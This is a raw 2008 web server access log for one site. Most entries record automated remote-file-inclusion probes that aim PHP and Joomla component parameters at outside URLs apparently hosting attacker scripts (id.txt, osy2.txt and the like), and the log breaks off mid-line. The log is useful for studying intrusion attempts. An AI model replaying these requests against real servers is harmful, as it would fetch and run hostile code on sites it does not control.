124.217.243.21 - - [10/Nov/2008:10:02:57 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:10:02:58 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:10:02:58 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:03:02 -0800] "GET /logs/access_080727.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:10:03:03 -0800] "GET /logs/access_080707.log/reports.php?sub=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:10:03:03 -0800] "GET /reports.php?sub=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.30.131.2 - - [10/Nov/2008:10:03:03 -0800] "GET /logs/reports.php?sub=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:03:03 -0800] "GET /logs/access_081017.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:03:04 -0800] "GET /logs/access_080914.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
210.205.6.168 - - [10/Nov/2008:10:03:05 -0800] "GET /logs/access_081008.log/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.243.21 - - [10/Nov/2008:10:03:05 -0800] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/format.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.205.6.168 - - [10/Nov/2008:10:03:05 -0800] "GET /errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.168 - - [10/Nov/2008:10:03:06 -0800] "GET /logs/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:03:13 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:03:13 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:03:13 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:03:13 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:03:14 -0800] "GET /logs/access_081015.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:03:15 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:03:15 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:03:16 -0800] "GET /logs/access_080801.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.40.221.65 - - [10/Nov/2008:10:03:22 -0800] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.40.221.65 - - [10/Nov/2008:10:03:23 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 200 94735 "-" "libwww-perl/5.79" "www.dmulk.com"
211.40.221.65 - - [10/Nov/2008:10:03:24 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:03:28 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:03:28 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:03:29 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:03:29 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:03:30 -0800] "GET /logs/access_080914.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:03:31 -0800] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:10:03:51 -0800] "GET /logs/access_080919.log//vwar/backup/errors.php?error=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.244 - - [10/Nov/2008:10:03:51 -0800] "GET /logs/access_080927.log//vwar/backup/errors.php?error=http://yeonkok.puru.net/img/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:03:54 -0800] "GET /logs/access_080718.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:03:56 -0800] "GET /logs/access_081015.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.46.174.20 - - [10/Nov/2008:10:03:56 -0800] "GET /logs/access_080904.log%20//include/admin.lib.inc.php?site_path=ftp://195.145.231.178/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:03:56 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:03:57 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:04:08 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:04:08 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 200 95026 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:04:10 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:04:13 -0800] "GET /logs/access_081021.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/xQt/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:04:17 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:04:18 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:19 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:19 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:04:19 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:20 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
114.141.2.7 - - [10/Nov/2008:10:04:20 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://guitar3.com/finance7/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:10:04:28 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:10:04:28 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:10:04:30 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:10:04:34 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:10:04:34 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:38 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:38 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:38 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:39 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:04:45 -0800] "GET /logs/access_080914.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:04:53 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.75.172.112 - - [10/Nov/2008:10:04:58 -0800] "GET /logs/access_080730.log//vwar/backup/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.172.112 - - [10/Nov/2008:10:04:59 -0800] "GET /vwar/backup/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.75.172.112 - - [10/Nov/2008:10:04:59 -0800] "GET /logs//vwar/backup/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.183.174 - - [10/Nov/2008:10:05:00 -0800] "GET /logs/access_081021.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:05:00 -0800] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:05:14 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:05:15 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:05:21 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:05:21 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:05:22 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:05:28 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:05:40 -0800] "GET /logs/access_080504.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.172.112 - - [10/Nov/2008:10:06:03 -0800] "GET /logs/access_080805.log//vwar/backup/errors.php?error=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.179.200 - - [10/Nov/2008:10:06:17 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [10/Nov/2008:10:06:17 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.deriline.com/mail_list/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:06:18 -0800] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:06:19 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:06:19 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:06:21 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.baab.it/osy2.txt? HTTP/1.1" 200 95026 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:10:06:25 -0800] "GET /logs/access_080927.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.214.17.211 - - [10/Nov/2008:10:06:26 -0800] "GET /logs/access_080919.log//admin/classes/TplLoad.php?full_path_to_public_program=http://shoppingcause.com/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:06:47 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:06:47 -0800] "GET /logs/access_080408.log/pages.php?page=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:06:47 -0800] "GET /pages.php?page=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:06:48 -0800] "GET /logs/pages.php?page=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.240.146.118 - - [10/Nov/2008:10:07:08 -0800] "GET /logs/access_080504.log HTTP/1.1" 200 1703936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.240.146.118 - - [10/Nov/2008:10:07:13 -0800] "GET /logs/access_080922.log HTTP/1.1" 200 1703936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:07:32 -0800] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:07:37 -0800] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:07:38 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.102.137.163 - - [10/Nov/2008:10:07:53 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.baab.it/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:08:17 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:08:17 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [10/Nov/2008:10:08:21 -0800] "GET /logs/access_080410.log//agendax/addevent.inc.php?agendax_path=http://guitar3.com/finance7/temp/v7id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:08:39 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:08:39 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.193.228.200 - - [10/Nov/2008:10:08:39 -0800] "GET /main.php?pagina=http://www.excelsiorsupreme.org/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
213.193.228.200 - - [10/Nov/2008:10:08:39 -0800] "GET /logs/main.php?pagina=http://www.excelsiorsupreme.org/images/response??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:08:42 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:08:43 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:10:08:44 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.19.122.234 - - [10/Nov/2008:10:08:51 -0800] "GET /logs/access_071215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://myypaa.org/templates/base/css/idFeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:08:59 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:09:00 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:10:09:00 -0800] "GET /logs/access_080914.log//guestbook1//admin.php?include_path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:10:09:00 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
165.219.245.62 - - [10/Nov/2008:10:09:00 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "dmulk.com"
211.76.137.5 - - [10/Nov/2008:10:09:00 -0800] "GET /guestbook1//admin.php?include_path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
211.76.137.5 - - [10/Nov/2008:10:09:00 -0800] "GET /logs//guestbook1//admin.php?include_path=http://rfiscan.ucoz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
165.219.245.62 - - [10/Nov/2008:10:09:01 -0800] "GET / HTTP/1.1" 200 94167 "http://www.st-owners.com/forums/showthread.php?t=53179" "Mozilla/4.0 (comp